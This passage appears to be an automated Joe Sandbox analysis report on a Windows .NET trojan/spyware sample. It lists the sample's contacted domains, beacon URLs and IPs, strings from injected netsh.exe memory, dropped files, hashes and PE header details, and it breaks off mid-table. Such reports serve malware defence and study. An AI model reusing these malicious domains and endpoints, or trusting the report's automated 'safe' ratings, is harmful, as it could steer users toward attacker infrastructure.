                                  http://www.bnbuotqakx.shop/0hhg/false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quantummquest.top/0hhg/false
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dainikmirpur.com/0hhg/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yamiyasheec.online/0hhg/false
                                  • 3%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dhleba51.ru/0hhg/false
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.xxaiai.top/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.bettaroom.ru/0hhg/false
                                  • 8%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.cucuzeus88.store/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabnetsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.instagram.com/hover_domainsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.nic.ru/catalog/ssl/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.nic.ru/jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://push.zhanzhang.baidu.com/push.jsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://www.hover.com/email?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.hover.com/about?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.nic.ru/catalog/domains/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.nic.ru/help/oshibka-404_8500.htmlnetsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://www.hover.com/domains/resultsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://www.nic.ru/catalog/hosting/shared/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssnetsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.hover.com/tools?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://help.hover.com/home?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://yastatic.net/pcode/adfox/loader.jsnetsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.hover.com/domain_pricing?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.hover.com/privacy?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://twitter.com/hovernetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoXnetsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.hover.com/transfer_in?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.hover.com/renew?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rCnetsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://zz.bdstatic.com/linksubmit/push.jsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.nic.ru/catalog/hosting/dedicated/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org/autocomplete?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.nic.ru/catalog/hosting/vds-vps/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.hover.com/tos?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.bnbuotqakx.shopjBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.nic.ru/catalog/hosting/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.hover.com/?source=parkedjBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    203.161.50.127
                                                                                                    		www.quantummquest.topMalaysia
                                                                                                    		45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                    195.24.68.5
                                                                                                    		www.dhleba51.ruRussian Federation
                                                                                                    		48287RU-CENTERRUfalse
                                                                                                    153.92.8.41
                                                                                                    		cucuzeus88.storeGermany
                                                                                                    		47583AS-HOSTINGERLTfalse
                                                                                                    101.99.93.157
                                                                                                    		bnbuotqakx.shopMalaysia
                                                                                                    		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse
                                                                                                    188.116.38.155
                                                                                                    		applesolve.comPoland
                                                                                                    		43333NEPHAX-ASPLfalse
                                                                                                    148.251.36.121
                                                                                                    		vavada-band.ruGermany
                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                    119.18.54.116
                                                                                                    		yamiyasheec.onlineIndia
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                    108.186.8.158
                                                                                                    		www.xxaiai.topUnited States
                                                                                                    		54600PEGTECHINCUSfalse
                                                                                                    192.250.235.36
                                                                                                    		dainikmirpur.comUnited States
                                                                                                    		36454CNSV-LLCUSfalse
                                                                                                    91.195.240.19
                                                                                                    		parkingpage.namecheap.comGermany
                                                                                                    		47846SEDO-ASDEfalse
                                                                                                    194.58.112.173
                                                                                                    		www.bettaroom.ruRussian Federation
                                                                                                    		197695AS-REGRUfalse
                                                                                                    216.40.34.41
                                                                                                    		www.whirledairlines.comCanada
                                                                                                    		15348TUCOWSCAfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1435169
                                                                                                    Start date and time:2024-05-02 08:23:06 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 8s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:light
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:8
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:yZcecBUXN7.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:9cd48f0d93c28ae6559409de23414554.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@14/12
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 75%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 85%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • HTTP Packets have been reduced
                                                                                                    • TCP Packets have been reduced to 100
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    08:25:02API Interceptor6957285x Sleep call for process: netsh.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    No context

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASNs

                                                                                                    No context

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):706
                                                                                                    Entropy (8bit):5.349842958726647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                    C:\Users\user\AppData\Local\Temp\1-00F23L

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.622095379937431
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:yZcecBUXN7.exe
                                                                                                    File size:631'808 bytes
                                                                                                    MD5:9cd48f0d93c28ae6559409de23414554
                                                                                                    SHA1:a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
                                                                                                    SHA256:3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
                                                                                                    SHA512:1204b683f15e89bb0f09b1be5fd3a18afbe83c72e95023cc58864924bec0f2dd3f228983365f654e22e822e7c0438c0b4d37660b8e2d875881ab859a488f4c34
                                                                                                    SSDEEP:12288:vDo1nsbnnnnncQlbt7WD31NYfr2S+K/WKBGEnnnnnnnnnnnnnnnnnnnnnnnnnnnO:LAnsbnnnnnXtaDFNYjnTzBNnnnnnnnnU
                                                                                                    TLSH:5DD4E03D9BD84A39D9AFCB3BD0F05911F632F2E2158AD34E5095A3B91D07790EA0235B
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.................0.................. ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x49b6de
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b68c0x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x642.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
